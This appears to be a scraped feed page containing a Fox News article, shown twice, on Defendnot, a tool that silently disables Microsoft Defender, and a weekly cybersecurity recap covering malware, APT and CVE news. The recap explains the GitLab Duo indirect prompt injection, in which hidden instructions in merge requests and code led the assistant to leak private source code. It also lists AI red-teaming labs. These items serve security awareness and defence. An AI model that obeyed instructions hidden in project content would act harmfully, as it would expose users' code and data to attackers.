Cyberguy.com/Contact.For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter.Ask Kurt a question or let us know what stories you'd like us to cover.Follow Kurt on his social channels:Answers to the most-asked CyberGuy questions:New from Kurt:Copyright 2025 CyberGuy.com. All rights reserved. Kurt "CyberGuy" Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on "FOX & Friends." Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.
    #windows #pcs #risk #new #tool
    Windows PCs at risk as new tool disarms built-in security
    Published May 29, 2025 10:00am EDT close Windows Defender Security Center scam: How to protect your computer from fake pop-ups Tech expert Kurt "CyberGuy" Knutsson says a tech support scam used a fake Windows Defender pop-up, tricking the victim to call and download software. All modern Windows PCs come with Microsoft Defender built in. For the unaware, this tool is Windows’ native antivirus. Over time, it has matured into a reliable security tool capable of blocking a wide range of threats. However, a tool called Defendnot can shut down Microsoft Defender completely, without exploiting a bug or using malware. It simply convinces Windows that another antivirus is already running.The implications are serious. This tool does not break into the system or use advanced code injection. It uses Windows features the way they were designed to be used. And that makes the problem harder to detect and harder to fix. Windows software on a PCThe tool works by pretending to be an antivirusWindows is built to avoid running multiple antivirus products at once. When a third-party antivirus registers itself, Windows disables Microsoft Defender to prevent conflicts. Defendnot exploits this system using an undocumented API that security software uses to communicate with the Windows Security Center.The tool registers a fake antivirus that appears legitimate to the system. It uses a dummy DLL and injects it into Task Manager, a trusted Windows process. By operating inside this signed process, Defendnot avoids signature checks and permission blocks. Once the fake antivirus is registered, Windows disables Microsoft Defender without warning or confirmation.WINDOWS 10 SECURITY FLAWS LEAVE MILLIONS VULNERABLENo security alert is shown to the user. No visible changes are made to indicate that the system is unprotected. Unless someone checks manually, the machine remains open to attacks with no real-time protection running.The tool also includes options to set a custom antivirus name, enable logging and configure automatic startup. It achieves persistence by creating a scheduled task that runs whenever the user logs in. Windows software on a laptopFrom GitHub takedown to a fresh buildDefendnot is based on an earlier project called No-Defender. That project used code from an actual antivirus product to fake registration. It gained attention quickly and was removed after a copyright complaint from the vendor whose code had been reused. The developer took the project down and walked away from it.With Defendnot, the creator rebuilt the core features using original code. This version avoids copyright issues and uses a new method to achieve the same effect. It does not rely on another antivirus or third-party binaries. It was written from scratch to demonstrate how simple it is to manipulate Windows security from inside the system.Microsoft Defender currently flags the tool as a threat. It detects and quarantines it under the name Win32/Sabsik.FL.!ml. However, the fact that it works at all points to a weakness in how Windows handles antivirus registration and trust.WHAT IS ARTIFICIAL INTELLIGENCE? Windows laptop showing the home screen6 ways to protect yourself from malicious programsWhile Defendnot is a research project, there’s a chance that similar tools are already out there and could be used to compromise your PC. Here are a few tips to help you stay safe:1. Use strong antivirus software: Even with regular updates, Windows systems can be left exposed by tools like Defendnot that silently disable built-in defenses. A strong third-party antivirus with real-time protection and frequent updates provides essential backup security. Look for solutions with real-time protection and frequent updates to tackle emerging threats. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices.2. Limit exposure: Many exploits rely on user interaction, such as clicking a shady link, downloading a compromised file or mounting an untrusted virtual disk. Stick to reputable websites, avoid opening unsolicited email attachments and use a browser with built-in security features.3. Avoid running unexpected commands: Never paste or run commandsyou don’t understand or that were copied from random websites. Attackers often trick users into unknowingly running malware this way.4. Keep your software updated: Regularly update your operating system, browsers and all software applications. Updates often include patches for security vulnerabilities that malware can exploit.5. Use two-factor authentication: Enable 2FA on all your accounts. This adds an extra layer of security by requiring a second form of verification, making it harder for attackers to gain access even if they have your password.6. Invest in personal data removal services: Even with strong device security, your personal information may still be exposed online through data brokers and people-finder sites. These services collect and publish details like your name, address and phone number, making you an easier target for identity theft or phishing. Automated data removal services track down these sites and submit removal requests on your behalf, helping to reduce your digital footprint and increase your online anonymity. While they can't erase every trace of your information, they make it significantly harder for attackers to find and exploit your personal data, which saves you time and reduces unwanted spam in the process.While no service promises to remove all your data from the internet, having a removal service is great if you want to constantly monitor and automate the process of removing your information from hundreds of sites continuously over a longer period of time. Check out my top picks for data removal services here.Get a free scan to find out if your personal information is already out on the web.Kurt’s key takeawayDefendnot points to a bigger issue with how Windows handles security. It takes a feature meant to prevent software conflicts and turns it into a way to completely disable protection. The system assumes any registered antivirus is legitimate, so if attackers can fake that, they get in without much resistance.We often think of security as blocking the bad and trusting the good. But this case shows what happens when that trust is misplaced. Defendnot doesn’t sneak past Windows defenses. It walks right in using valid credentials. The solution isn’t just more patches or stronger malware signatures. What we need is a smarter way for systems to tell what is actually safe.CLICK HERE TO GET THE FOX NEWS APPDo you think companies like Microsoft need to rethink how Windows handles antivirus registration and trust, given that tools like Defendnot can so easily disable built-in protections without using malware or exploiting a bug? Let us know by writing us at Cyberguy.com/Contact.For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter.Ask Kurt a question or let us know what stories you'd like us to cover.Follow Kurt on his social channels:Answers to the most-asked CyberGuy questions:New from Kurt:Copyright 2025 CyberGuy.com. All rights reserved. Kurt "CyberGuy" Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on "FOX & Friends." Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com. #windows #pcs #risk #new #tool
    WWW.FOXNEWS.COM
    Windows PCs at risk as new tool disarms built-in security
    Published May 29, 2025 10:00am EDT close Windows Defender Security Center scam: How to protect your computer from fake pop-ups Tech expert Kurt "CyberGuy" Knutsson says a tech support scam used a fake Windows Defender pop-up, tricking the victim to call and download software. All modern Windows PCs come with Microsoft Defender built in. For the unaware, this tool is Windows’ native antivirus. Over time, it has matured into a reliable security tool capable of blocking a wide range of threats. However, a tool called Defendnot can shut down Microsoft Defender completely, without exploiting a bug or using malware. It simply convinces Windows that another antivirus is already running.The implications are serious. This tool does not break into the system or use advanced code injection. It uses Windows features the way they were designed to be used. And that makes the problem harder to detect and harder to fix. Windows software on a PC (Kurt "CyberGuy" Knutsson)The tool works by pretending to be an antivirusWindows is built to avoid running multiple antivirus products at once. When a third-party antivirus registers itself, Windows disables Microsoft Defender to prevent conflicts. Defendnot exploits this system using an undocumented API that security software uses to communicate with the Windows Security Center.The tool registers a fake antivirus that appears legitimate to the system. It uses a dummy DLL and injects it into Task Manager, a trusted Windows process. By operating inside this signed process, Defendnot avoids signature checks and permission blocks. Once the fake antivirus is registered, Windows disables Microsoft Defender without warning or confirmation.WINDOWS 10 SECURITY FLAWS LEAVE MILLIONS VULNERABLENo security alert is shown to the user. No visible changes are made to indicate that the system is unprotected. Unless someone checks manually, the machine remains open to attacks with no real-time protection running.The tool also includes options to set a custom antivirus name, enable logging and configure automatic startup. It achieves persistence by creating a scheduled task that runs whenever the user logs in. Windows software on a laptop (Kurt "CyberGuy" Knutsson)From GitHub takedown to a fresh buildDefendnot is based on an earlier project called No-Defender. That project used code from an actual antivirus product to fake registration. It gained attention quickly and was removed after a copyright complaint from the vendor whose code had been reused. The developer took the project down and walked away from it.With Defendnot, the creator rebuilt the core features using original code. This version avoids copyright issues and uses a new method to achieve the same effect. It does not rely on another antivirus or third-party binaries. It was written from scratch to demonstrate how simple it is to manipulate Windows security from inside the system.Microsoft Defender currently flags the tool as a threat. It detects and quarantines it under the name Win32/Sabsik.FL.!ml. However, the fact that it works at all points to a weakness in how Windows handles antivirus registration and trust.WHAT IS ARTIFICIAL INTELLIGENCE (AI)? Windows laptop showing the home screen (Kurt "CyberGuy" Knutsson)6 ways to protect yourself from malicious programsWhile Defendnot is a research project, there’s a chance that similar tools are already out there and could be used to compromise your PC. Here are a few tips to help you stay safe:1. Use strong antivirus software: Even with regular updates, Windows systems can be left exposed by tools like Defendnot that silently disable built-in defenses. A strong third-party antivirus with real-time protection and frequent updates provides essential backup security. Look for solutions with real-time protection and frequent updates to tackle emerging threats. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices.2. Limit exposure: Many exploits rely on user interaction, such as clicking a shady link, downloading a compromised file or mounting an untrusted virtual disk. Stick to reputable websites, avoid opening unsolicited email attachments and use a browser with built-in security features (like Microsoft Edge or Chrome with Safe Browsing enabled).3. Avoid running unexpected commands: Never paste or run commands (like PowerShell scripts) you don’t understand or that were copied from random websites. Attackers often trick users into unknowingly running malware this way.4. Keep your software updated: Regularly update your operating system, browsers and all software applications. Updates often include patches for security vulnerabilities that malware can exploit.5. Use two-factor authentication (2FA): Enable 2FA on all your accounts. This adds an extra layer of security by requiring a second form of verification, making it harder for attackers to gain access even if they have your password.6. Invest in personal data removal services: Even with strong device security, your personal information may still be exposed online through data brokers and people-finder sites. These services collect and publish details like your name, address and phone number, making you an easier target for identity theft or phishing. Automated data removal services track down these sites and submit removal requests on your behalf, helping to reduce your digital footprint and increase your online anonymity. While they can't erase every trace of your information, they make it significantly harder for attackers to find and exploit your personal data, which saves you time and reduces unwanted spam in the process.While no service promises to remove all your data from the internet, having a removal service is great if you want to constantly monitor and automate the process of removing your information from hundreds of sites continuously over a longer period of time. Check out my top picks for data removal services here.Get a free scan to find out if your personal information is already out on the web.Kurt’s key takeawayDefendnot points to a bigger issue with how Windows handles security. It takes a feature meant to prevent software conflicts and turns it into a way to completely disable protection. The system assumes any registered antivirus is legitimate, so if attackers can fake that, they get in without much resistance.We often think of security as blocking the bad and trusting the good. But this case shows what happens when that trust is misplaced. Defendnot doesn’t sneak past Windows defenses. It walks right in using valid credentials. The solution isn’t just more patches or stronger malware signatures. What we need is a smarter way for systems to tell what is actually safe.CLICK HERE TO GET THE FOX NEWS APPDo you think companies like Microsoft need to rethink how Windows handles antivirus registration and trust, given that tools like Defendnot can so easily disable built-in protections without using malware or exploiting a bug? Let us know by writing us at Cyberguy.com/Contact.For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter.Ask Kurt a question or let us know what stories you'd like us to cover.Follow Kurt on his social channels:Answers to the most-asked CyberGuy questions:New from Kurt:Copyright 2025 CyberGuy.com. All rights reserved. Kurt "CyberGuy" Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on "FOX & Friends." Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.
    0 Комментарии 0 Поделились 0 предпросмотр
  • Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs

    Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late.
    For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we need focused analysis—not noise.
    What you'll see here isn't just a list of incidents, but a clear look at where control is being gained, lost, or quietly tested.
    Threat of the Week
    Lumma Stealer, DanaBot Operations Disrupted — A coalition of private sector companies and law enforcement agencies have taken down the infrastructure associated with Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in the development and deployment of DanaBot. The malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information. More uniquely, though, DanaBot has also been used for hacking campaigns that appear to be linked to Russian state-sponsored interests. All of that makes DanaBot a particularly clear example of how commodity malware has been repurposed by Russian state hackers for their own goals. In tandem, about 2,300 domains that acted as the command-and-controlbackbone for the Lumma information stealer have been seized, alongside taking down 300 servers and neutralizing 650 domains that were used to launch ransomware attacks. The actions against international cybercrime in the past few days constituted the latest phase of Operation Endgame.

    Get the Guide ➝

    Top News

    Threat Actors Use TikTok Videos to Distribute Stealers — While ClickFix has become a popular social engineering tactic to deliver malware, threat actors have been observed using artificial intelligence-generated videos uploaded to TikTok to deceive users into running malicious commands on their systems and deploy malware like Vidar and StealC under the guise of activating pirated version of Windows, Microsoft Office, CapCut, and Spotify. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware," Trend Micro said.
    APT28 Hackers Target Western Logistics and Tech Firms — Several cybersecurity and intelligence agencies from Australia, Europe, and the United States issued a joint alert warning of a state-sponsored campaign orchestrated by the Russian state-sponsored threat actor APT28 targeting Western logistics entities and technology companies since 2022. "This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations," the agencies said. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts.
    Chinese Threat Actors Exploit Ivanti EPMM Flaws — The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobilesoftwareto target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The intrusions leverage the vulnerabilities to obtain a reverse shell and drop malicious payloads like KrustyLoader, which is known to deliver the Sliver command-and-controlframework. "UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization."
    Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. Links to these browser add-ons are hosted on specially crafted sites to which users are likely redirected to via phishing and social media posts. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Several of these extensions have been taken down by Google.
    CISA Warns of SaaS Providers of Attacks Targeting Cloud Environments — The U.S. Cybersecurity and Infrastructure Security Agencywarned that SaaS companies are under threat from bad actors who are on the prowl for cloud applications with default configurations and elevated permissions. While the agency did not attribute the activity to a specific group, the advisory said enterprise backup platform Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault'sMicrosoft 365backup software-as-a-servicesolution, hosted in Azure," CISA said. "This provided the threat actors with unauthorized access to Commvault's customers' M365 environments that have application secrets stored by Commvault."
    GitLab AI Coding Assistant Flaws Could Be Used to Inject Malicious Code — Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligenceassistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. The attack could also leak confidential issue data, such as zero-day vulnerability details. All that's required is for the attacker to instruct the chatbot to interact with a merge requestby taking advantage of the fact that GitLab Duo has extensive access to the platform. "By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," Legit Security said. One variation of the attack involved hiding a malicious instruction in an otherwise legitimate piece of source code, while another exploited Duo's parsing of markdown responses in real-time asynchronously. An attacker could leverage this behavior – that Duo begins rendering the output line by line rather than waiting until the entire response is generated and sending it all at once – to introduce malicious HTML code that can access sensitive data and exfiltrate the information to a remote server. The issues have been patched by GitLab following responsible disclosure.

    ‎️‍ Trending CVEs
    Software vulnerabilities remain one of the simplest—and most effective—entry points for attackers. Each week uncovers new flaws, and even small delays in patching can escalate into serious security incidents. Staying ahead means acting fast. Below is this week's list of high-risk vulnerabilities that demand attention. Review them carefully, apply updates without delay, and close the doors before they're forced open.
    This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027, CVE-2025-30911, CVE-2024-57273, CVE-2024-54780, and CVE-2024-54779, CVE-2025-41229, CVE-2025-4322, CVE-2025-47934, CVE-2025-30193, CVE-2025-0993, CVE-2025-36535, CVE-2025-47949, CVE-2025-40775, CVE-2025-20152, CVE-2025-4123, CVE-2025-5063, CVE-2025-37899, CVE-2025-26817, CVE-2025-47947, CVE-2025-3078, CVE-2025-3079, and CVE-2025-4978.
    Around the Cyber World

    Sandworm Drops New Wiper in Ukraine — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it deployed the ZEROLOT wiper in Ukraine. For this, the attackers abused Active Directory Group Policy in the affected organizations," ESET Director of Threat Research, Jean-Ian Boutin, said. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox.
    Signal Says No to Recall — Signal has released a new version of its messaging app for Windows that, by default, blocks the ability of Windows to use Recall to periodically take screenshots of the app. "Although Microsoft made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content that's displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft began officially rolling out Recall last month.
    Russia Introduces New Law to Track Foreigners Using Their Smartphones — The Russian government has introduced a new law that makes installing a tracking app mandatory for all foreign nationals in the Moscow region. This includes gathering their real-time locations, fingerprint, face photograph, and residential information. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "If migrants change their actual place of residence, they will be required to inform the Ministry of Internal Affairswithin three working days." A proposed four-year trial period begins on September 1, 2025, and runs until September 1, 2029.
    Dutch Government Passes Law to Criminalize Cyber Espionage — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. Under the amended law, leaking sensitive information that is not classified as a state secret or engaging in activities on behalf of a foreign government that harm Dutch interests can also result in criminal charges. "Foreign governments are also interested in non-state-secret, sensitive information about a particular economic sector or about political decision-making," the government said. "Such information can be used to influence political processes, weaken the Dutch economy or play allies against each other. Espionage can also involve actions other than sharing information."
    Microsoft Announces Availability of Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it's making post-quantum cryptographycapabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0. "This advancement will enable customers to commence their exploration and experimentation of PQC within their operational environments," Microsoft said. "By obtaining early access to PQC capabilities, organizations can proactively assess the compatibility, performance, and integration of these novel algorithms alongside their existing security infrastructure."
    New Malware DOUBLELOADER Uses ALCATRAZ for Obfuscation — The open-source obfuscator ALCATRAZ has been seen within a new generic loader dubbed DOUBLELOADER, which has been deployed alongside Rhadamanthys Stealer infections starting December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hardcoded IP addressstored within the binary. "Obfuscators such as ALCATRAZ end up increasing the complexity when triaging malware," Elastic Security Labs said. "Its main goal is to hinder binary analysis tools and increase the time of the reverse engineering process through different techniques; such as hiding the control flow or making decompilation hard to follow."
    New Formjacking Campaign Targets WooCommerce Sites — Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. The malware, per Wordfence, injects a fake but professional-looking payment form into legitimate checkout processes and exfiltrates sensitive customer data to an external server. Further analysis has revealed that the infection likely originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via a Simple Custom CSS and JS pluginthat allows administrators to add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site's design and payment workflow, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware author repurposed the browser's localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page."

    E.U. Sanctions Stark Industries — The European Unionhas announced sanctions against 21 individuals and six entities in Russia over its "destabilising actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider that has been accused of acting as "enablers of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber attacks against the Union and third countries." The sanctions also target its CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries was previously spotlighted by independent cybersecurity journalist Brian Krebs, detailing its use in DDoS attacks in Ukraine and across Europe. In August 2024, Team Cymru said it discovered 25 Stark-assigned IP addresses used to host domains associated with FIN7 activities and that it had been working with Stark Industries for several months to identify and reduce abuse of their systems. The sanctions have also targeted Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming in Baltic states and disrupting civil aviation.
    The Mask APT Unmasked as Tied to the Spanish Government — The mysterious threat actor known as The Maskhas been identified as run by the Spanish government, according to a report published by TechCrunch, citing people who worked at Kaspersky at the time and had knowledge of the investigation. The Russian cybersecurity company first exposed the hacking group in 2014, linking it to highly sophisticated attacks since at least 2007 targeting high-profile organizations, such as governments, diplomatic entities, and research institutions. A majority of the group's attacks have targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. While Kaspersky has not publicly attributed it to a specific country, the latest revelation makes The Mask one of the few Western government hacking groups that has ever been discussed in public. This includes the Equation Group, the Lamberts, and Animal Farm.
    Social Engineering Scams Target Coinbase Users — Earlier this month, cryptocurrency exchange Coinbase revealed that it was the victim of a malicious attack perpetrated by unknown threat actors to breach its systems by bribing customer support agents in India and siphon funds from nearly 70,000 customers. According to Blockchain security firm SlowMist, Coinbase users have been the target of social engineering scams since the start of the year, bombarding with SMS messages claiming to be fake withdrawal requests and seeking their confirmation as part of a "sustained and organized scam campaign." The goal is to induce a false sense of urgency and trick them into calling a number, eventually convincing them to transfer the funds to a secure wallet with a seed phrase pre-generated by the attackers and ultimately drain the assets. It's assessed that the activities are primarily carried out by two groups: low-level skid attackers from the Com community and organized cybercrime groups based in India. "Using spoofed PBX phone systems, scammers impersonate Coinbase support and claim there's been 'unauthorized access' or 'suspicious withdrawals' on the user's account," SlowMist said. "They create a sense of urgency, then follow up with phishing emails or texts containing fake ticket numbers or 'recovery links.'"
    Delta Can Sue CrowdStrike Over July 2024 Mega Outage — Delta Air Lines, which had its systems crippled and almost 7,000 flights canceled in the wake of a massive outage caused by a faulty update issued by CrowdStrike in mid-July 2024, has been given the green light to pursue to its lawsuit against the cybersecurity company. A judge in the U.S. state of Georgia stating Delta can try to prove that CrowdStrike was grossly negligent by pushing a defective update to its Falcon software to customers. The update crashed 8.5 million Windows devices across the world. Crowdstrike previously claimed that the airline had rejected technical support offers both from itself and Microsoft. In a statement shared with Reuters, lawyers representing CrowdStrike said they were "confident the judge will find Delta's case has no merit, or will limit damages to the 'single-digit millions of dollars' under Georgia law." The development comes months after MGM Resorts International agreed to pay million to settle multiple class-action lawsuits related to a data breach in 2019 and a ransomware attack the company experienced in 2023.
    Storm-1516 Uses AI-Generated Media to Spread Disinformation — The Russian influence operation known as Storm-1516sought to spread narratives that undermined the European support for Ukraine by amplifying fabricated stories on X about European leaders using drugs while traveling by train to Kyiv for peace talks. One of the posts was subsequently shared by Russian state media and Maria Zakharova, a senior official in Russia's foreign ministry, as part of what has been described as a coordinated disinformation campaign by EclecticIQ. The activity is also notable for the use of synthetic content depicting French President Emmanuel Macron, U.K. Labour Party leader Keir Starmer, and German chancellor Friedrich Merz of drug possession during their return from Ukraine. "By attacking the reputation of these leaders, the campaign likely aimed to turn their own voters against them, using influence operationsto reduce public support for Ukraine by discrediting the politicians who back it," the Dutch threat intelligence firm said.
    Turkish Users Targeted by DBatLoader — AhnLab has disclosed details of a malware campaign that's distributing a malware loader called DBatLoadervia banking-themed banking emails, which then acts as a conduit to deliver SnakeKeylogger, an information stealer developed in .NET. "The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processesthrough techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processesfor behaviors such as file copying and changing policies," the company said.
    SEC SIM-Swapper Sentenced to 14 Months for SEC X Account Hack — A 26-year-old Alabama man, Eric Council Jr., has been sentenced to 14 months in prison and three years of supervised release for using SIM swapping attacks to breach the U.S. Securities and Exchange Commission'sofficial X account in January 2024 and falsely announced that the SEC approved BitcoinExchange Traded Funds. Council Jr.was arrested in October 2024 and pleaded guilty to the crime earlier this February. He has also been ordered to forfeit According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account."
    FBI Warns of Malicious Campaign Impersonating Government Officials — The U.S. Federal Bureau of Investigationis warning of a new campaign that involves malicious actors impersonating senior U.S. federal or state government officials and their contacts to target individuals since April 2025. "The malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior US official in an effort to establish rapport before gaining access to personal accounts," the FBI said. "One way the actors gain such access is by sending targeted individuals a malicious link under the guise of transitioning to a separate messaging platform." From there, the actor may present malware or introduce hyperlinks that lead intended targets to an actor-controlled site that steals login information.
    DICOM Flaw Enables Attackers to Embed Malicious Code Within Medical Image Files — Praetorian has released a proof-of-conceptfor a high-severity security flaw in Digital Imaging and Communications in Medicine, predominant file format for medical images, that enables attackers to embed malicious code within legitimate medical image files. CVE-2019-11687, originally disclosed in 2019 by Markel Picado Ortiz, stems from a design decision that allows arbitrary content at the start of the file, otherwise called the Preamble, which enables the creation of malicious polyglots. Codenamed ELFDICOM, the PoC extends the attack surface to Linux environments, making it a much more potent threat. As mitigations, it's advised to implement a DICOM preamble whitelist. "DICOM's file structure inherently allows arbitrary bytes at the beginning of the file, where Linux and most operating systems will look for magic bytes," Praetorian researcher Ryan Hennessee said. "would check a DICOM file's preamble before it is imported into the system. This would allow known good patterns, such as 'TIFF' magic bytes, or '\x00' null bytes, while files with the ELF magic bytes would be blocked."
    Cookie-Bite Attack Uses Chrome Extension to Steal Session Tokens — Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite that employs custom-made malicious browser extensions to steal "ESTAUTH" and "ESTSAUTHPERSISTNT" cookies in Microsoft Azure Entra ID and bypass multi-factor authentication. The attack has multiple moving parts to it: A custom Chrome extension that monitors authentication events and captures cookies; a PowerShell script that automates the extension deployment and ensures persistence; an exfiltration mechanism to send the cookies to a remote collection point; and a complementary extension to inject the captured cookies into the attacker's browser. "Threat actors often use infostealers to extract authentication tokens directly from a victim's machine or buy them directly through darkness markets, allowing adversaries to hijack active cloud sessions without triggering MFA," Varonis said. "By injecting these cookies while mimicking the victim's OS, browser, and network, attackers can evade Conditional Access Policiesand maintain persistent access." Authentication cookies can also be stolen using adversary-in-the-middlephishing kits in real-time, or using rogue browser extensions that request excessive permissions to interact with web sessions, modify page content, and extract stored authentication data. Once installed, the extension can access the browser's storage API, intercept network requests, or inject malicious JavaScript into active sessions to harvest real-time session cookies. "By leveraging stolen session cookies, an adversary can bypass authentication mechanisms, gaining seamless entry into cloud environments without requiring user credentials," Varonis said. "Beyond initial access, session hijacking can facilitate lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing permissions or misconfigured roles."

    Cybersecurity Webinars

    Non-Human Identities: The AI Backdoor You're Not Watching → AI agents rely on Non-Human Identitiesto function—but these are often left untracked and unsecured. As attackers shift focus to this hidden layer, the risk is growing fast. In this session, you'll learn how to find, secure, and monitor these identities before they're exploited. Join the webinar to understand the real risks behind AI adoption—and how to stay ahead.
    Inside the LOTS Playbook: How Hackers Stay Undetected → Attackers are using trusted sites to stay hidden. In this webinar, Zscaler experts share how they detect these stealthy LOTS attacks using insights from the world's largest security cloud. Join to learn how to spot hidden threats and improve your defense.

    Cybersecurity Tools

    ScriptSentry → It is a free tool that scans your environment for dangerous logon script misconfigurations—like plaintext credentials, insecure file/share permissions, and references to non-existent servers. These overlooked issues can enable lateral movement, privilege escalation, or even credential theft. ScriptSentry helps you quickly identify and fix them across large Active Directory environments.
    Aftermath → It is a Swift-based, open-source tool for macOS incident response. It collects forensic data—like logs, browser activity, and process info—from compromised systems, then analyzes it to build timelines and track infection paths. Deploy via MDM or run manually. Fast, lightweight, and ideal for post-incident investigation.
    AI Red Teaming Playground Labs → It is an open-source training suite with hands-on challenges designed to teach security professionals how to red team AI systems. Originally developed for Black Hat USA 2024, the labs cover prompt injections, safety bypasses, indirect attacks, and Responsible AI failures. Built on Chat Copilot and deployable via Docker, it's a practical resource for testing and understanding real-world AI vulnerabilities.

    Tip of the Week
    Review and Revoke Old OAuth App Permissions — They're Silent Backdoor → You've likely logged into apps using "Continue with Google," "Sign in with Microsoft," or GitHub/Twitter/Facebook logins. That's OAuth. But did you know many of those apps still have access to your data long after you stop using them?
    Why it matters:
    Even if you delete the app or forget it existed, it might still have ongoing access to your calendar, email, cloud files, or contact list — no password needed. If that third-party gets breached, your data is at risk.
    What to do:

    Go through your connected apps here:
    Google: myaccount.google.com/permissions
    Microsoft: account.live.com/consent/Manage
    GitHub: github.com/settings/applications
    Facebook: facebook.com/settings?tab=applications

    Revoke anything you don't actively use. It's a fast, silent cleanup — and it closes doors you didn't know were open.
    Conclusion
    Looking ahead, it's not just about tracking threats—it's about understanding what they reveal. Every tactic used, every system tested, points to deeper issues in how trust, access, and visibility are managed. As attackers adapt quickly, defenders need sharper awareness and faster response loops.
    The takeaways from this week aren't just technical—they speak to how teams prioritize risk, design safeguards, and make choices under pressure. Use these insights not just to react, but to rethink what "secure" really needs to mean in today's environment.

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.
    #weekly #recap #apt #campaigns #browser
    ⚡ Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs
